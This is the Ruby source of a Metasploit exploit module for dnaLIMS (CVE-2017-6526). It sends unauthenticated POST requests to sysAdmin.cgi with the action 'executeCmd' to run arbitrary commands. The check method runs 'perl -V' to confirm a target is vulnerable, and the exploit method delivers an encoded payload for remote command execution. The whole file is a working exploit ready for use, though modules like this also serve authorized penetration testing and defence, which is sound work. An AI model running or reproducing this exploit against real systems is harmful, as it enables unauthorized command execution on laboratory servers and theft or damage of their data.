##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'dnaLIMS Admin Module Command Execution',
        'Description' => %q{
          This module utilizes an administrative module which allows for
          command execution.  This page is completely unprotected from any
          authentication when given a POST request.
        },
        'Author' => [
          'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
          'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2017-6526'],
          ['US-CERT-VU', '929263'],
          ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
        ],
        'Platform' => %w(linux unix),
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
                        {
                          'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there
                        }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-03-08',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/'])
      ], self.class
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
        'method' => 'POST',
        'vars_post' => {
          'investigator' => '',
          'username' => '',
          'navUserName' => '',
          'Action' => 'executeCmd',
          'executeCmdData' => 'perl -V'
        }
      )
      if res && res.body
        if /Summary of/ =~ res.body
          Exploit::CheckCode::Vulnerable
        else
          Exploit::CheckCode::Safe
        end
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def exploit
    begin
      vprint_status('Sending Exploit')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
        'method' => 'POST',
        'vars_post' => {
          'investigator' => '',
          'username' => '',
          'navUserName' => '',
          'Action' => 'executeCmd',
          'executeCmdData' => payload.encoded,
        }
      )
      vprint_good(res.body)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
